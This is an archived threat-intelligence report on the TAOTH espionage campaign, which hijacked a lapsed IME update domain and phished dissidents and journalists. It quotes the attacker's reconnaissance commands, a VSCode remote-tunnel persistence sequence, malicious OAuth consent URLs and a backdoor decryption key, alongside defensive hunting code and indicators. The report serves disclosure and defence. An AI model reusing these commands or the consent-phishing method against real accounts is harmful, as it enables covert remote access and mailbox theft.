{
	"id": "cbc58afa-52ef-4bb1-b800-5a9d1743afe7",
	"created_at": "2026-04-06T00:22:03.554526Z",
	"updated_at": "2026-04-10T03:20:59.122736Z",
	"deleted_at": null,
	"sha1_hash": "538ad2302d4482df77017d7e238edf804a25085e",
	"title": "TAOTH Campaign Exploits End-of-Support Software to Target Traditional Chinese Users and Dissidents",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2125007,
	"plain_text": "TAOTH Campaign Exploits End-of-Support Software to Target\r\nTraditional Chinese Users and Dissidents\r\nBy By: Nick Dai, Pierre Lee Aug 28, 2025 Read time: 10 min (2596 words)\r\nPublished: 2025-08-28 · Archived: 2026-04-05 20:22:27 UTC\r\nAPT \u0026 Targeted Attacks\r\nThe TAOTH campaign exploited abandoned software and spear-phishing to deploy multiple malware families, targeting\r\ndissidents and other high-value individuals across Eastern Asia.\r\n \r\nKey takeaways\r\nThe TAOTH campaign leveraged an abandoned Sogou Zhuyin IME update server and spear-phishing operations to\r\ndeliver multiple malware families—including TOSHIS, C6DOOR, DESFY, and GTELAM—primarily targeting\r\nusers across Eastern Asia.\r\nAttackers employed sophisticated infection chains, such as hijacked software updates and fake cloud storage or login\r\npages, to distribute malware and collect sensitive information.\r\nThe campaign’s victimology and decoy documents reveal a focus on high-value targets, including dissidents,\r\njournalists, researchers, and technology/business leaders in China, Taiwan, Hong Kong, Japan, South Korea, and\r\noverseas Taiwanese communities.\r\nInfrastructure and tool analysis link TAOTH to previously documented threat activity, showing shared C\u0026C\r\ninfrastructure, malware variants, and tactics indicative of a single, persistent attacker group with a focus on\r\nreconnaissance, espionage, and email abuse.\r\nTrend Vision One™ detects and blocks the indicators of compromise (IOCs) outlined in this blog, and provides\r\ncustomers with tailored hunting queries, threat insights, and intelligence updates. \r\nIntroduction\r\nIn June, we identified and investigated an unusual security incident involving the installation of two malware families,\r\nC6DOOR and GTELAM, on a victim’s host. Our investigation determined that the malware was delivered through a\r\nlegitimate input method editor (IME) software, Sogou Zhuyin. 
Briefly, an IME is a tool that interprets sequences of keystrokes into complex characters for languages not suited to a standard QWERTY keyboard (like many East Asian languages).\r\nThe software had stopped receiving updates in 2019; in October 2024, attackers took over the lapsed domain name and used it to distribute malicious payloads. Telemetry data indicates that at least several hundred victims were affected, with infections leading to additional post-exploitation activities.\r\nThrough infrastructure tracking, we observed that the same threat actor is also targeting high-value individuals primarily located in Eastern Asia. In this article, in addition to the attacks abusing Sogou Zhuyin, we also examine a related spear-phishing campaign targeting Japan, Korea, China, and Taiwan.\r\nOperation 1: Sogou Zhuyin\r\nSogou Zhuyin is an IME developed by the Chinese technology company Sogou, which provides two IMEs for different phonetic systems: Sogou Pinyin and Sogou Zhuyin (Zhuyin, also known as Bopomofo, is the main phonetic system for Mandarin in Taiwan). Sogou Zhuyin was originally released for users in Taiwan but has not been maintained since 2019.\r\nOur analysis shows that the attacker registered the abandoned update domain and has used it to host malicious updates since October 2024. Through this channel, multiple malware families have been deployed, including GTELAM, C6DOOR, DESFY, and TOSHIS.\r\nInfection chain\r\nAccording to an archived version of its Wikipedia page, the Sogou Zhuyin service was terminated in June 2019. However, starting in October 2024, the attacker hijacked the abandoned official update domain (sogouzhuyin[.]com) and, by 2025, was distributing the official installer through it. 
With the update server under attacker control, the Sogou Zhuyin application began delivering malicious updates in November 2024.\r\nBased on our telemetry, the threat actor deployed four distinct malware families in this operation: TOSHIS, DESFY, GTELAM, and C6DOOR. The deployed malware families serve different purposes, including remote access (RAT), information theft, and backdoor functionality. To evade detection, the threat actors also leveraged third-party cloud services to conceal their network activities across the attack chain.\r\nhttps://www.trendmicro.com/en_us/research/25/h/taoth-campaign.html\r\nPage 1 of 11\r\nThe full infection chain is as follows:\r\nFigure 1. The infection chain for the first operation\r\nFirst, the victims download the official installer from the Internet. For example, we found that someone modified the Traditional Chinese Wikipedia page for Sogou Zhuyin in March 2025 and added the formerly legitimate but now-malicious domain dl[.]sogouzhuyin[.]com to it.\r\nFigure 2. The modified Wikipedia page for Sogou Zhuyin\r\nOur analysis confirms that the downloaded installer is the official, unmodified version. However, a few hours after installation, the automatic update process is triggered. The updater, ZhuyinUp.exe, then attempts to retrieve an update configuration file from the following embedded URL:\r\nhttps[:]//srv-pc[.]sogouzhuyin[.]com/v1/upgrade/version\r\nFigure 3. The embedded update URL that ZhuyinUp.exe connects to\r\nThe update configuration file contains the URL and MD5 hash of the update installer. Once the update installer is downloaded and its MD5 hash matches, the installer is executed. Because the configuration file and the installer are both served from the hijacked domain, this check only confirms that the download arrived intact; it says nothing about who produced it, so an attacker controlling the domain simply serves a payload together with its own MD5.\r\nFigure 4. The downloaded update configuration file\r\nBased on our analysis, there were at least four malware families delivered through the update, including DESFY, GTELAM, C6DOOR and TOSHIS. 
So far, we have observed the attacker deploying malware such as DESFY and GTELAM to profile victims and identify high-value targets.\r\nVictimology\r\nSince Sogou Zhuyin targets users who understand Zhuyin, most of the victims are based in Taiwan. However, the impact extends beyond the region: overseas Taiwanese communities have also been affected, resulting in a globally distributed population of Taiwanese targets.\r\nFigure 5. Victimology distribution\r\nMalware analysis\r\nAccording to our analysis, four malware families were observed and dropped in victim environments: TOSHIS, DESFY, GTELAM and C6DOOR.\r\nTOSHIS\r\nThe TOSHIS malware functions primarily as a loader and has been observed in this operation since December 2024. It is identified as a variant of the Xiangoop malware family. TOSHIS acts as a stager by retrieving additional payloads from its command-and-control (C&C) server.\r\nIts infection mechanism involves patching the entry point of a legitimate Portable Executable (PE) file to execute malicious shellcode. This modification allows the malware to download and run further shellcode payloads from external sources. Trend Micro telemetry has identified several instances of modified binaries associated with this threat, including:\r\nSunloginDesktopAgent.exe\r\nSearchIndexer.exe\r\nProcmon.exe\r\nThe shellcode injected at the entry point resolves the Windows APIs it needs by comparing Adler-32 hashes of export names, so the API names do not appear as plain strings in the shellcode. It then maps the C&C data onto the stack, as shown below:\r\nFigure 6. The C&C configuration in the stack\r\nTOSHIS only continues on victims whose system language ID is one of the following:\r\n0x404: zh-TW\r\n0x804: zh-CN\r\n0x411: ja-JP\r\nFigure 7. The system language check routine\r\nIn all analyzed samples, the key for decrypting the final payload was consistently “qazxswedcvfrtgbn”. 
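The Adler-32 API hashing and the language-ID gate described above, as an added example (not code from the original article or from the TOSHIS sample): it rebuilds the hash-to-name lookup an analyst needs to label the imports in the entry-point shellcode and reproduces the three-locale check. The list of candidate export names, the assumption that the hash is taken over the plain ASCII name without a terminating NUL, and all function names are this example's own; confirm the exact hashing input against the disassembly before trusting the labels.\r\n

```python
import zlib

# Locale IDs that TOSHIS accepts (from Figure 7 in the article).
TARGET_LANG_IDS = {0x0404: 'zh-TW', 0x0804: 'zh-CN', 0x0411: 'ja-JP'}

# Candidate export names to pre-hash. This list is an assumption for the
# example: the real stub's hash table is not published on the page.
CANDIDATE_APIS = [
    'LoadLibraryA', 'GetProcAddress', 'VirtualAlloc', 'VirtualProtect',
    'CreateThread', 'GetUserDefaultUILanguage', 'GetSystemDefaultLangID',
    'InternetOpenA', 'InternetOpenUrlA', 'InternetReadFile', 'ExitProcess',
]


def api_hash(name, with_nul=False):
    # Adler-32 over the ASCII export name. Whether the NUL terminator is
    # included is an assumption to verify in the disassembly, hence the flag.
    data = name.encode('ascii') + (bytes([0]) if with_nul else b'')
    return zlib.adler32(data) & 0xFFFFFFFF


def build_table(names=CANDIDATE_APIS, with_nul=False):
    # hash -> name, the reverse of what the shellcode stores.
    return {api_hash(n, with_nul): n for n in names}


def resolve(h, table):
    # Look up one 32-bit constant pulled from the shellcode.
    return table.get(h & 0xFFFFFFFF)


def resolve_all(hashes, table):
    # Annotate a list of constants; unknown hashes stay unnamed so the
    # analyst can see which names are still missing from CANDIDATE_APIS.
    return [(h, resolve(h, table)) for h in hashes]


def passes_locale_gate(lang_id):
    # TOSHIS proceeds only when the system language ID is one of the three
    # values in TARGET_LANG_IDS; everything else is left alone.
    return (lang_id & 0xFFFF) in TARGET_LANG_IDS


if __name__ == '__main__':
    table = build_table()
    # Constants as they would be read from the stub; constructed here from
    # known names so the demonstration is self-contained.
    sample_constants = [api_hash('LoadLibraryA'), api_hash('VirtualAlloc'), 0xDEADBEEF]
    for h, name in resolve_all(sample_constants, table):
        print('0x%08X -> %s' % (h, name or '<unresolved>'))
    for lid in (0x0404, 0x0409, 0x0411):
        print('lang 0x%04X targeted: %s' % (lid, passes_locale_gate(lid)))
```

Once the hashing input is confirmed, the same constants double as a cheap fingerprint: the hashes of the handful of APIs every downloader needs (LoadLibraryA, VirtualAlloc, the WinINet calls) stay stable across builds for as long as the hash function does, which is useful when the loader is re-patched into yet another legitimate binary.\r\n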
The “qazxswedcvfrtgbn” key is the same one used for the payload downloaded by older Xiangoop samples.\r\nFigure 8. The key used in the payload downloaded from the old Xiangoop sample.\r\nBased on our analysis, the final payload is one of the following:\r\nCOBEACON (Cobalt Strike)\r\nMerlin agent for the Mythic framework\r\nDESFY\r\nDESFY is spyware that first emerged in May 2025 and acts as an information collector. It gathers filenames from the following locations:\r\nDesktop\r\nProgram Files\r\nOnce the filenames are collected, DESFY transmits them to the C&C server via HTTP POST. This functionality is likely used to profile victims and determine suitable targets.\r\nFigure 9. DESFY collects the file names from Desktop and Program Files\r\nGTELAM\r\nGTELAM is another spyware tool, first identified in May 2025, that also collects information about victims. Instead of collecting filenames from specific folders, it collects filenames with the following extensions:\r\n.pdf\r\n.doc\r\n.docx\r\n.xls\r\n.xlsx\r\n.ppt\r\n.pptx\r\nAll collected filenames are AES-encrypted and sent to Google Drive, so the exfiltration blends into traffic to a legitimate cloud service. This suggests that the tool is designed to identify and prioritize high-value targets.\r\nFigure 10. GTELAM collects document names\r\nC6DOOR\r\nC6DOOR is a custom backdoor written in Golang that supports both HTTP and WebSocket. Notably, the presence of embedded Simplified Chinese characters within the sample suggests that the threat actor may be Chinese-speaking.\r\nFigure 11. 
C6DOOR supports HTTP and WebSocket protocols\r\nIt supports the following commands:\r\nCommand | Description\r\nInformationCli | Retrieve victim information, including IP, OS, username and hostname\r\nExecuteCommandSleep | Set the sleep interval between backdoor commands\r\nExecuteCommandHandler | Execute arbitrary OS commands\r\nExecuteCommandSsh | Execute commands via SSH\r\nExecuteSendDirList | List directory contents\r\nExecuteSendDir | Send directory information\r\nExecuteEcho | Run the “echo” command\r\nExecuteCat | Display file contents\r\nExecuteMkdir | Create directories\r\nExecuteCopy | Copy files\r\nExecuteCommandScan | Network port scan\r\nDownloadHandler | Download files from the C&C server\r\nDownloadfileserver | Upload files to the C&C server\r\nExecuteCommandSftp | Transfer files through SFTP\r\nExecScreenshot | Capture screenshots\r\nGetAllProcessNames | List running processes\r\nExecuteshellcode | Inject shellcode (read from an existing file) into the target process. The shellcode is AES-decrypted with Key: fee8211f723b5bfeb74cc45b0eac7fcd275397ea8f538cf5ea138f12586e5b26 and IV: 6679580b03a7e9284f26c5936c8655fa\r\nExecutePwd | Print working directory\r\nTable 1. The commands in C6DOOR\r\nPost-exploitation routines\r\nIt appears that the attacker was still in the reconnaissance phase, primarily seeking high-value targets. As a result, no further post-exploitation activities were observed in the majority of victim systems. 
In one of the cases we analyzed, the attacker was inspecting the victim’s environment and establishing a tunnel using Visual Studio Code (VSCode).\r\nThe commands used in the post-exploitation stages:\r\nC:\\Windows\\System32\\tasklist.exe /svc\r\nC:\\Windows\\System32\\quser.exe\r\nC:\\Windows\\System32\\ipconfig.exe /all\r\nC:\\Windows\\System32\\net.exe time /domain\r\nC:\\Windows\\System32\\net.exe user\r\nC:\\Windows\\System32\\curl.exe cip.cc\r\nC:\\Windows\\System32\\cmd.exe /c ipconfig /all\r\nC:\\Windows\\System32\\cmd.exe /c echo %localappdata%\r\nC:\\Windows\\System32\\cmd.exe /c dir %localappdata%\\microsoft\r\nC:\\Windows\\System32\\cmd.exe /c dir %localappdata%\\Microsoft\\Office\r\nC:\\Windows\\System32\\cmd.exe /c curl -kOJL \"https://code.visualstudio.com/sha/download?build=stable\u0026os=cli-win32-x64\" \u0026 dir\r\nC:\\Windows\\System32\\cmd.exe /c tar -zxvf vscode_cli_win32_x64_cli.zip \u0026 dir .\r\nC:\\Windows\\System32\\cmd.exe /c del /f /q vscode_cli_win32_x64_cli.zip \u0026 dir .\r\nC:\\Windows\\System32\\cmd.exe /c code.exe tunnel user login --provider github \u003e z.txt \u0026 type z.txt\r\nC:\\Windows\\System32\\cmd.exe /c code.exe tunnel service install\r\nC:\\Windows\\System32\\HOSTNAME.EXE\r\nThe sequence is a host and network survey (process list, logged-on users, network configuration, domain time, local accounts, external IP via cip.cc) followed by a download of the official VSCode CLI using the system’s own curl.exe and tar.exe. The “tunnel user login” step binds the tunnel to an attacker-controlled GitHub account, and “tunnel service install” registers it as a Windows service so that it survives reboots; the resulting remote access rides over Microsoft’s tunnel infrastructure rather than a custom C&C server, which is why it is easy to miss in network telemetry alone.\r\nOperation 2: Spear-phishing\r\nUpon further investigation into the Sogou Zhuyin operation, we identified that one instance of the TOSHIS malware was distributed through a phishing website. 
Our analysis indicates that the same threat actor is orchestrating another spear-phishing campaign targeting Eastern Asia.\r\nTrend telemetry revealed the use of two types of phishing techniques:\r\nFake login pages that redirect victims to grant OAuth consent to attacker-controlled apps\r\nFake cloud storage pages that serve the TOSHIS malware as a download\r\nAdditionally, we discovered a series of decoy documents on politically related topics, suggesting that the threat actors are targeting journalists and dissidents in Eastern Asia.\r\nVictimology\r\nThe targeted victims are mainly located in Eastern Asia, including China, Hong Kong, Taiwan, Japan, and South Korea. A small number of victims were identified in the United States and Norway.\r\nFigure 12. Victimology distribution\r\nInfection chain\r\nFor the infection routine, the attacker first sends spear-phishing emails to targeted victims. These emails include either a phishing URL or a decoy document designed to entice the recipient to respond or interact with the malicious content. The attacker’s aim is to achieve either of the following:\r\nManipulate victim systems via the TOSHIS malware.\r\nGain unauthorized access to and control over the victim’s Google or Microsoft mailbox by obtaining OAuth consent.\r\nFigure 13. The infection chain for the second operation\r\nDecoy Documents\r\nAnalysis of the decoy documents suggests that the attacker is likely targeting the following groups:\r\nResearchers\r\nDissidents\r\nJournalists\r\nChief officers in the technology or business sectors\r\nFigure 14. Decoy document soliciting cooperation with the targeted journalist for a non-disclosure initiative aimed at gathering and curating trending public topics\r\nFigure 15. 
Decoy document asking for a paper from the targeted researcher\r\nAttack path 1: Fake cloud storage page\r\nThe fraudulent page is designed to mimic a legitimate cloud storage service. Upon accessing the site, victims are automatically prompted to download an archive file named material.zip.\r\nFigure 16. The fake cloud storage page\r\nThe following image shows the files archived in material.zip.\r\nFigure 17. The downloaded archive material.zip\r\nIn this case, the PDF file provided to the victim is intentionally corrupted, prompting the individual to click a counterfeit PDF reader executable named PDFreader.exe, which is a renamed copy of the legitimate McOds.exe binary. After the victim opens the fake PDF reader, the malicious module McVsoCfg.dll placed beside it is loaded via DLL sideloading: the legitimate executable looks for that DLL in its own directory before the system directories, so the attacker’s copy is the one that runs. Further analysis reveals that McVsoCfg.dll is a loader for the TOSHIS malware. It downloads another decoy document along with malicious shellcode. Ultimately, the final payload delivered through this infection chain is a Merlin agent.\r\nAttack path 2: Fake login page\r\nThe fraudulent pages are themed around various enticing topics, such as free birthday gifts, free coupons, or fake PDF readers. When victims interact with one of the login buttons, they are first redirected to an obfuscated intermediary page and then forwarded to a legitimate Google or Microsoft login portal.\r\nFigure 18. Fraudulent birthday page\r\nFigure 19. The login buttons shown on the birthday page\r\nThe destination is the legitimate OAuth consent site. 
We observed the following OAuth URLs prompting users to grant consent to the attacker-controlled application.\r\nhttps[:]//accounts[.]google[.]com/o/oauth2/auth?response_type=code\u0026client_id=715259374054-mst41mfku1h8l7ga5vbtrv8cm48h9nde.apps.googleusercontent.com\u0026redirect_uri=https%3A%2F%2Fwww.auth-web.com%2Fgm-oauth2-callback\u0026scope=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fgmail.modify\u0026state=LWbfFETatSc8EB9zpunfqcf54VsVaR\u0026access_type=\r\nhttps[:]//login[.]microsoftonline[.]com/common/oauth2/v2.0/authorize?scope=offline_access+contacts.read+user.read+mail.read+mail.send\u0026redirect_uri=https%3A%2F%2Fauth.onedrive365-jp.com%2Fgetauthtoken\u0026response_type=code\u0026client_id=e707daa3-579f-4bae-bb7d-89a73d52ffa1\r\nAs indicated by the URLs, the OAuth applications request scopes for email manipulation: gmail.modify on the Google side, and mail.read plus mail.send on the Microsoft side, where the request also asks for offline_access, which returns a refresh token so that access continues without further prompts until the grant is revoked or the provider invalidates the token. Because the victim authenticates on the genuine Google or Microsoft login page, password strength and MFA do not prevent this; the compromise is the consent grant itself, and the authorization code is delivered to the attacker’s redirect_uri (www.auth-web[.]com and auth.onedrive365-jp[.]com). This suggests that the attacker aims to exploit compromised email accounts to further target the victim’s contacts or connections, potentially facilitating lateral phishing or data exfiltration.\r\nFigure 20. The OAuth consent page\r\nThe obfuscated intermediary page works as a web beacon. It sends a request to a Chinese message-pushing service (sctapi[.]ftqq[.]com) for beaconing. The page is obfuscated with the public obfuscator.io service. Below is an example of the site after deobfuscation.\r\nFigure 21. 
The deobfuscated page\r\nAttribution\r\nOur investigation reveals that the TAOTH campaign, along with the threat activity from Cases 1 and 4 documented in ITOCHU's research, can be attributed to the same threat actor group, as supported by the following evidence:\r\nShared C&C infrastructure: Analysis identified overlapping C&C infrastructure between TAOTH and ITOCHU’s cases, particularly 45[.]32[.]117[.]177.\r\nShared tools: The TOSHIS malware is a variant of Xiangoop. Furthermore, the Cobalt Strike beacon detected in both investigations shares the same C&C address and watermark (520).\r\nSimilar tactics, techniques, and procedures (TTPs): The threat actor employs consistent methods, such as establishing VSCode tunnels and launching supply chain attacks via legitimate applications, including YouDao and Sogou.\r\nConsistent targeted regions: China, Taiwan and Hong Kong.\r\nConclusion\r\nThis article examines the TAOTH campaign and offers insights into how the attacker leverages an end-of-support application to deploy malware through software updates, alongside spear-phishing operations.\r\nIn the Sogou Zhuyin operation, the threat actor maintained a low profile, conducting reconnaissance to identify valuable targets among victims. To facilitate this, spyware such as DESFY and GTELAM was used for information theft. Notably, GTELAM conceals its data exfiltration by abusing Google Drive as a transfer mechanism. Meanwhile, in the ongoing spear-phishing operations, the attacker distributed malicious emails to the targets for further exploitation.\r\nTo proactively defend against similar attacks, enterprises should routinely audit their environments for end-of-support software and promptly remove or replace such applications; an abandoned application whose update domain has lapsed keeps polling that domain, and whoever registers it next decides what the updater runs.  
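The two consent URLs shown under Attack path 2 can be triaged mechanically before anyone clicks Allow. The following is an added example, not code from the article or from either identity provider: it parses an authorization URL, extracts the application ID, the redirect host and the requested scopes, and rates the grant by the scopes the article calls out (gmail.modify, mail.read, mail.send, offline_access). The scope-to-risk table, the allow-list of redirect hosts, the blocking policy and all function names are assumptions made for the example.\r\n

```python
from urllib.parse import parse_qs, urlparse

# Scope -> risk rating. This table is an assumption for the example; adjust it
# to the scopes your tenant actually allows third-party apps to request.
SCOPE_RISK = {
    'https://www.googleapis.com/auth/gmail.modify': 'critical',  # read, write and send mail
    'https://mail.google.com/': 'critical',
    'https://www.googleapis.com/auth/gmail.readonly': 'high',
    'mail.send': 'critical',
    'mail.readwrite': 'critical',
    'mail.read': 'high',
    'offline_access': 'high',   # refresh token: access persists without re-prompting
    'contacts.read': 'medium',
    'user.read': 'low',
    'openid': 'low', 'profile': 'low', 'email': 'low',
}
LEVELS = ['low', 'medium', 'high', 'critical']

PROVIDERS = {
    'accounts.google.com': 'google',
    'login.microsoftonline.com': 'microsoft',
}

# Redirect hosts your organisation has vetted (constructed for the example).
TRUSTED_REDIRECT_HOSTS = {'app.example.com'}


def triage_consent_url(url, trusted_hosts=TRUSTED_REDIRECT_HOSTS):
    parts = urlparse(url)
    q = parse_qs(parts.query)
    redirect = q.get('redirect_uri', [''])[0]
    # Both providers accept a space-separated scope list; parse_qs has
    # already turned the '+' used by the Microsoft URL into spaces.
    scopes = q.get('scope', [''])[0].split()
    ratings = [SCOPE_RISK.get(s.lower(), 'medium') for s in scopes]  # unknown scope -> medium
    risk = max(ratings, key=LEVELS.index) if ratings else 'low'
    redirect_host = urlparse(redirect).netloc.lower()
    return {
        'provider': PROVIDERS.get(parts.netloc.lower(), 'unknown'),
        'client_id': q.get('client_id', [''])[0],
        'redirect_host': redirect_host,
        'redirect_trusted': redirect_host in trusted_hosts,
        'scopes': scopes,
        'risk': risk,
        # Mailbox access plus a refresh token is the lateral-phishing setup
        # the article describes, so flag it separately.
        'persistent': 'offline_access' in (s.lower() for s in scopes),
    }


def should_block(report):
    # Policy for the example: deny anything rated high or worse that lands on
    # a redirect host nobody has vetted.
    return LEVELS.index(report['risk']) >= LEVELS.index('high') and not report['redirect_trusted']


# The two consent URLs from the article, with the defanging removed.
GOOGLE_URL = ('https://accounts.google.com/o/oauth2/auth?response_type=code'
              '&client_id=715259374054-mst41mfku1h8l7ga5vbtrv8cm48h9nde.apps.googleusercontent.com'
              '&redirect_uri=https%3A%2F%2Fwww.auth-web.com%2Fgm-oauth2-callback'
              '&scope=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fgmail.modify'
              '&state=LWbfFETatSc8EB9zpunfqcf54VsVaR&access_type=')
MS_URL = ('https://login.microsoftonline.com/common/oauth2/v2.0/authorize?'
          'scope=offline_access+contacts.read+user.read+mail.read+mail.send'
          '&redirect_uri=https%3A%2F%2Fauth.onedrive365-jp.com%2Fgetauthtoken'
          '&response_type=code&client_id=e707daa3-579f-4bae-bb7d-89a73d52ffa1')

if __name__ == '__main__':
    for u in (GOOGLE_URL, MS_URL):
        r = triage_consent_url(u)
        print(r['provider'], r['client_id'], r['redirect_host'], r['risk'],
              'block' if should_block(r) else 'allow')
```

The useful output is the application ID and redirect host rather than the phishing page URL: both providers let a tenant administrator block or revoke consent by application ID, which survives the attacker rotating landing pages, and the redirect host is what to search for in proxy logs to find users who already completed the flow.\r\n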
Additionally, users are advised to verify the file extensions of all downloads from the internet and carefully review the permissions requested by cloud applications before granting access.\r\nProactive security with Trend Vision One™\r\nTrend Vision One™ is the only AI-powered enterprise cybersecurity platform that centralizes cyber risk exposure management, security operations, and robust layered protection. This holistic approach helps enterprises predict and prevent threats, accelerating proactive security outcomes across their respective digital estate. With Trend Vision One, you’re enabled to eliminate security blind spots, focus on what matters most, and elevate security into a strategic partner for innovation.\r\nTrend Vision One™ Threat Intelligence\r\nTo stay ahead of evolving threats, Trend customers can access Trend Vision One™ Threat Insights, which provides the latest insights from Trend™ Research on emerging threats and threat actors.\r\nTrend Vision One Threat Insights\r\nTAOTH Campaign Exploits End-of-Support Software to Target Traditional Chinese Users and Dissidents\r\nTrend Vision One Intelligence Reports (IOC Sweeping)\r\nTAOTH Campaign Exploits End-of-Support Software and Phishing to Target Dissidents and Journalists in East Asia\r\nHunting Queries\r\nTrend Vision One Search App\r\nTrend Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post with data in their environment. 
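For teams whose process-creation telemetry lives outside Trend Vision One, the following added example (not code from the article or from Trend) turns the post-exploitation command list under Operation 1 into a hunt: it flags the VSCode CLI download, the tunnel login and service install, the cip.cc external-IP lookup, and a burst of distinct reconnaissance tools from one host inside a short window. The pipe-delimited log format, the sample events, the window and threshold values and all function names are constructed for the example; map the fields onto your own EDR or Sysmon process-creation schema.\r\n

```python
from collections import defaultdict

# Reconnaissance binaries from the article's command list (by image basename).
RECON_TOOLS = {'tasklist.exe', 'quser.exe', 'ipconfig.exe', 'net.exe', 'hostname.exe'}
# Command-line markers for the VSCode CLI download and the external-IP check.
VSCODE_CLI_DOWNLOAD = 'code.visualstudio.com/sha/download'
EXTERNAL_IP_SERVICE = 'cip.cc'


def parse_line(line):
    # Constructed format for the example: '<epoch>|<host>|<image path>|<command line>'.
    ts, host, image, cmdline = line.split('|', 3)
    basename = image.replace('/', '\\').rsplit('\\', 1)[-1].lower()
    return {'ts': int(ts), 'host': host, 'image': basename, 'cmdline': cmdline}


def is_vscode_tunnel(cmdline):
    # Match 'code.exe tunnel ...' wherever it appears inside a cmd /c wrapper,
    # but not ordinary editor launches such as 'code.exe --version'.
    tokens = cmdline.lower().split()
    return any(t.endswith('code.exe') and tokens[i + 1] == 'tunnel'
               for i, t in enumerate(tokens[:-1]))


def classify(ev):
    # Per-event rules; each returns a rule name the SOC can route on.
    cmd = ev['cmdline'].lower()
    rules = []
    if VSCODE_CLI_DOWNLOAD in cmd and 'cli-win32' in cmd:
        rules.append('vscode_cli_download')
    if is_vscode_tunnel(ev['cmdline']):
        rules.append('vscode_tunnel')
    if ev['image'] == 'curl.exe' and EXTERNAL_IP_SERVICE in cmd:
        rules.append('external_ip_lookup')
    return rules


def hunt(lines, window=300, threshold=3):
    # Returns one finding per triggered rule plus at most one recon-burst
    # finding per host (>= threshold distinct recon tools inside window seconds).
    events = [parse_line(l) for l in lines]
    findings = []
    recon = defaultdict(list)
    for ev in events:
        for rule in classify(ev):
            findings.append({'host': ev['host'], 'ts': ev['ts'], 'rule': rule, 'detail': ev['cmdline']})
        if ev['image'] in RECON_TOOLS:
            recon[ev['host']].append(ev)
    for host, evs in recon.items():
        evs.sort(key=lambda e: e['ts'])
        for i, first in enumerate(evs):
            tools = {e['image'] for e in evs[i:] if e['ts'] - first['ts'] <= window}
            if len(tools) >= threshold:
                findings.append({'host': host, 'ts': first['ts'], 'rule': 'recon_burst',
                                 'detail': ', '.join(sorted(tools))})
                break
    return findings


# Constructed sample telemetry: WS-101 mirrors the article's command sequence,
# WS-202 is benign noise (a lone ipconfig and a normal editor launch).
SAMPLE_LOG = [
    '1700000000|WS-101|C:\\Windows\\System32\\tasklist.exe|tasklist /svc',
    '1700000005|WS-101|C:\\Windows\\System32\\quser.exe|quser',
    '1700000009|WS-101|C:\\Windows\\System32\\ipconfig.exe|ipconfig /all',
    '1700000014|WS-101|C:\\Windows\\System32\\net.exe|net user',
    '1700000020|WS-101|C:\\Windows\\System32\\curl.exe|curl cip.cc',
    '1700000040|WS-101|C:\\Windows\\System32\\cmd.exe|cmd /c curl -kOJL https://code.visualstudio.com/sha/download?build=stable&os=cli-win32-x64 & dir',
    '1700000090|WS-101|C:\\Windows\\System32\\cmd.exe|cmd /c code.exe tunnel user login --provider github > z.txt & type z.txt',
    '1700000120|WS-101|C:\\Windows\\System32\\cmd.exe|cmd /c code.exe tunnel service install',
    '1700000300|WS-202|C:\\Windows\\System32\\ipconfig.exe|ipconfig /all',
    '1700000310|WS-202|C:\\Program Files\\Microsoft VS Code\\Code.exe|Code.exe --version',
]

if __name__ == '__main__':
    for f in hunt(SAMPLE_LOG):
        print('%s %d %-20s %s' % (f['host'], f['ts'], f['rule'], f['detail']))
```

The tunnel rules are the high-confidence ones: a workstation that installs the VSCode CLI with curl and then registers a tunnel as a service has almost no benign explanation, whereas the recon burst on its own is noisy (help-desk scripts produce the same pattern) and is better used to rank hosts for review than to page on.\r\n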
\r\nVSAPI Detection\r\neventName:MALWARE_DETECTION AND malName:(*TOSHIS* OR *C6DOOR* OR *GTELAM* OR *DESFY*)\r\nNetwork – domain\r\neventSubId:602 AND (objectHostName: \"practicalpublishing.s3.dualstack.us-east-1.amazonaws.com\" OR objectHostName: \"www.auth-web.com\" OR objectHostName: \"auth.onedrive365-jp.com\")\r\nNetwork – IP\r\neventId:3 AND (src:\"45.32.117.177\" OR src:\"64.176.50.181\" OR src:\"154.90.62.210\" OR src:\"38.60.203.134\" OR src:\"192.124.176.51\" OR dst:\"45.32.117.177\" OR dst:\"64.176.50.181\" OR dst:\"154.90.62.210\" OR dst:\"38.60.203.134\" OR dst:\"192.124.176.51\")\r\nIndicators of Compromise\r\nThe indicators of compromise for this entry can be found here.\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/25/h/taoth-campaign.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/25/h/taoth-campaign.html"
	],
	"report_names": [
		"taoth-campaign.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434923,
	"ts_updated_at": 1775791259,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/538ad2302d4482df77017d7e238edf804a25085e.pdf",
		"text": "https://archive.orkl.eu/538ad2302d4482df77017d7e238edf804a25085e.txt",
		"img": "https://archive.orkl.eu/538ad2302d4482df77017d7e238edf804a25085e.jpg"
	}
}